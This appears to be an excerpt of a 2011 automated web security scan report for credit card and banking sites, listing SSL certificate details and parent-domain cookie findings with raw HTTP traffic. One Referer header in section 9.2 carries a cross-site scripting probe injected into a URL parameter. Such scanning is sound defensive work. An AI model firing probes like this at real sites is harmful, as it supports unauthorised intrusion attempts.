Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

8.7. https://online.citibank.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	online.citibank.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Aug 24 19:00:00 CDT 2009
Valid to:	Thu Aug 25 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.8. https://www.accountonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.accountonline.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.accountonline.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jun 06 19:00:00 CDT 2011
Valid to:	Tue Jul 02 18:59:59 CDT 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.9. https://www.applyonlinenow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.applyonlinenow.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.applyonlinenow.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Wed Feb 09 18:00:00 CST 2011
Valid to:	Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.10. https://www.citicards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.citicards.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Wed Jun 01 19:00:00 CDT 2011
Valid to:	Tue Jul 02 18:59:59 CDT 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.11. https://www.discovercard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.discovercard.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Thu Nov 04 19:00:00 CDT 2010
Valid to:	Sat Nov 05 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.12. https://www201.americanexpress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www201.americanexpress.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www201.americanexpress.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Aug 15 19:00:00 CDT 2010
Valid to:	Tue Aug 16 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.13. https://www262.americanexpress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www262.americanexpress.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Mar 06 18:00:00 CST 2011
Valid to:	Sun Apr 08 18:59:59 CDT 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

9. Cookie scoped to parent domain previous next
There are 44 instances of this issue:

http://www.capitalone.com/smallbusiness/cards/venture-for-business/
http://as00.estara.com/fs/ruleaction.php
http://b.scorecardresearch.com/b
http://cf.addthis.com/red/p.json
http://click.linksynergy.com/fs-bin/click
http://click.linksynergy.com/fs-bin/click
http://pixel.33across.com/ps/
http://sales.liveperson.net/hc/32528459/
http://tags.bluekai.com/site/2750
http://tags.bluekai.com/site/2939
http://www.capitalone.com/css/global/portal_base.css
http://www.capitalone.com/css/global/portal_common.css
http://www.capitalone.com/css/global/portal_grid.css
http://www.capitalone.com/css/global/portal_print.css
http://www.capitalone.com/css/page-type/portal_landing-accordion.css
http://www.capitalone.com/css/page-type/portal_popup.css
http://www.capitalone.com/css/page-type/portal_product.css
http://www.capitalone.com/css/portal_footer.css
http://www.capitalone.com/css/portal_header.css
http://www.capitalone.com/css/portal_page-nav-heading.css
http://www.capitalone.com/img/global/icon/lock.gif
http://www.capitalone.com/img/global/logo/ehl.png
http://www.capitalone.com/img/global/logo/fdic.png
http://www.capitalone.com/img/global/logo/sprite/header.gif
http://www.capitalone.com/js/component/portal_accordion.js
http://www.capitalone.com/js/component/portal_open_account.js
http://www.capitalone.com/js/component/portal_swfobject.js
http://www.capitalone.com/js/component/portal_utilitynav.js
http://www.capitalone.com/js/global/cof/portal_header.js
http://www.capitalone.com/js/global/cof/portal_headerFooter.js
http://www.capitalone.com/js/global/portal_cof.js
http://www.capitalone.com/js/global/portal_footnote.js
http://www.capitalone.com/js/global/portal_global.js
http://www.capitalone.com/js/liveperson/LivePerson_USC_VS.js
http://www.capitalone.com/js/liveperson/mtagconfig.js
http://www.capitalone.com/js/onlineopinionF3cS/oo_conf_en-US.js
http://www.capitalone.com/js/onlineopinionF3cS/oo_engine.js
http://www.capitalone.com/js/questus/config.js
http://www.capitalone.com/js/questus/intercept.js
http://www.capitalone.com/media/graphic_logo/global/button/action-oversized-apply-now.png
http://www.capitalone.com/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg
http://www.wtp101.com/bk
https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0
https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. http://www.capitalone.com/smallbusiness/cards/venture-for-business/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.capitalone.com
Path:	/smallbusiness/cards/venture-for-business/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WWWJSESSIONID=QfmGN7BTg0PVLQh9shh7J4wx98JVymDjjJ517tMnYMVD5qnrzfQv!512190221!1391065199; domain=.capitalone.com; path=/; secure
Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:10 GMT; path=/
SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; BIGipServerpl_capitalone.com_80=828974346.29215.0000; external_id=GAN_ZZ10700001_USCGAN_j26689465k112308_631528059; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: WWWJSESSIONID=QfmGN7BTg0PVLQh9shh7J4wx98JVymDjjJ517tMnYMVD5qnrzfQv!512190221!1391065199; domain=.capitalone.com; path=/; secure
Set-Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
Set-Cookie: caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:10 GMT; path=/
Set-Cookie: SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
Set-Cookie: external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
Set-Cookie: portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
Content-Length: 39376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/><meta http-e
...[SNIP]...

9.2. http://as00.estara.com/fs/ruleaction.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as00.estara.com
Path:	/fs/ruleaction.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

fscookies=b64_Xc3BDoMwCIDht-G2BWih9NBnWbqtiTvYGa3v70FXybj9.QIQAIKQinec0IE6JEI-5GcrayOjjyXXd92mFOIdHIPG30gYGDHE2-hpa8IzvnOpR6gV7eKZqcsR1w7bHbYiVuTvz5TbayzXwd47; expires=Wed, 15-Jun-2016 12:03:40 GMT; path=/; domain=.estara.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fs/ruleaction.php?accountid=200106286435&urid=51189,45529&cookieurid=&estara_fsguid=04831D1D8268F1A4BA988C1220519DBD&dnc=1308312216957615571 HTTP/1.1
Host: as00.estara.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1a69c8%22-alert(document.location)-%2236ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g
Cookie: fsserver__SESSION__=t-1201.estara.com; fs_nocache_guid=897661DA01AED5466FF67DD4FD9B666D; fscookies=b64_Tcs5DoAwDETR29CBbCd2nCJnQSCQoCAgCPenYPN0X09DAAhCKt5xQgfqkAh91fVlPAoZbfcuD-lcUogNOAaN7yRUjBhiPc3lSPjEuo35DrWin3hm.uSO-8P2w1bEirxyAQ__

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:40 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Pragma: no-cache
Set-Cookie: fscookies=b64_Xc3BDoMwCIDht-G2BWih9NBnWbqtiTvYGa3v70FXybj9.QIQAIKQinec0IE6JEI-5GcrayOjjyXXd92mFOIdHIPG30gYGDHE2-hpa8IzvnOpR6gV7eKZqcsR1w7bHbYiVuTvz5TbayzXwd47; expires=Wed, 15-Jun-2016 12:03:40 GMT; path=/; domain=.estara.com
Content-Length: 8
Content-Type: text/html; charset=UTF-8

if(0){}

9.3. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 16-Jun-2013 11:59:07 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&rn=275967894&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Fblogs.creditcards.com%252F%26r%3Dhttp%253A%252F%252Fwww.creditcards.com%252Fpoints-rewards.php&c3=1234567891234567891&c9=http%3A%2F%2Fblogs.creditcards.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fblogs.creditcards.com%2F&r=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 17 Jun 2011 11:59:07 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 16-Jun-2013 11:59:07 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.4. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308311946.1FE|1308311946.60|1308311946.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; Domain=.addthis.com; Expires=Sun, 16-Jun-2013 11:59:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4dfb41a21066432c&callback=_ate.ad.hrr&pub=creditcards.com&uid=4dce8a530508b02d&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&ref=http%3A%2F%2Fblogs.creditcards.com%2F&1x7h47n HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; psc=0; dt=X; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308311946.1FE|1306359996.1OD|1308225884.19F|1308311946.60|1308225884.1VV|1308311946.1EY; uid=4dce8a530508b02d; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Fri, 17 Jun 2011 11:59:35 GMT
Set-Cookie: di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308311946.1FE|1308311946.60|1308311946.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; Domain=.addthis.com; Expires=Sun, 16-Jun-2013 11:59:35 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 17-Jul-2011 11:59:35 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Fri, 17 Jun 2011 11:59:35 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

9.5. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 11:59:56 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A224261%3A1124cf812011e906cc17069a599054; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 11:59:56 GMT; Path=/
lsn_track=UmFuZG9tSVYRizqjZXnGQxDToyno5A9RBlx%2Fm1pnukrSaDAZFqlMAg5QwCbNuuMthrS4noYNoIWwbsKdQsozzg%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 11:59:56 GMT; Path=/
lsclick_mid1335="2011-06-17 11:59:56.312|EhraRx8K%2FBE-BQHxeK4lVk5JnoYun3f8jw"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 11:59:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/click?id=EhraRx8K/BE&offerid=214035.10002088&type=3&subid=0&u1=1124cf812011e906cc17069a599054 HTTP/1.1
Host: click.linksynergy.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; lsn_qstring=EhraRx8K%2FBE%3A227478%3A1120e8cd201180061c17060a514329; lsn_track=UmFuZG9tSVZTGei6OP%2B7uQzzprzIV6pvp2RqaKp7Pb5IaO9VwdRdPkp1DAnI1Qzrj8wqGV%2FSx%2FwxjPyvCsywig%3D%3D; lsclick_mid2291="2011-06-17 11:51:31.045|EhraRx8K_BE-PWS2r5T7Tzgjw3IqElyKzA"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 11:59:56 GMT; Path=/
Set-Cookie: lsn_qstring=EhraRx8K%2FBE%3A224261%3A1124cf812011e906cc17069a599054; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 11:59:56 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVYRizqjZXnGQxDToyno5A9RBlx%2Fm1pnukrSaDAZFqlMAg5QwCbNuuMthrS4noYNoIWwbsKdQsozzg%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 11:59:56 GMT; Path=/
Set-Cookie: lsclick_mid1335="2011-06-17 11:59:56.312|EhraRx8K%2FBE-BQHxeK4lVk5JnoYun3f8jw"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 11:59:56 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Fri, 17 Jun 2011 11:59:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: http://www201.americanexpress.com/sbsapp/FMACServlet?request_type=GoldSCLP&openeep=42732&PID=1&BUID=SBS&PSKU=BGR&CRTV=SCLPBGR&EAID=EhraRx8K%2FBE-BQHxeK4lVk5JnoYun3f8jw
Content-Length: 0
Connection: close

9.6. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 12:00:31 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A227478%3A1118b79220110c061317070b00ed04; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 12:00:31 GMT; Path=/
lsn_track=UmFuZG9tSVYkVQ7zZ50sMP6zzgyOXYFH4NxsDcK9L89L9V6GAZUtq7w%2Fv0c5e2Gg3c6Q8Ny5aiajimfEubz9lw%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 12:00:31 GMT; Path=/
lsclick_mid2291="2011-06-17 12:00:31.668|EhraRx8K_BE-Gq0WXXscoeFiJWMkyMbiLA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 12:00:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/click?id=EhraRx8K/BE&offerid=227478.10001588&type=3&subid=0&u1=1118b79220110c061317070b00ed04 HTTP/1.1
Host: click.linksynergy.com
Proxy-Connection: keep-alive
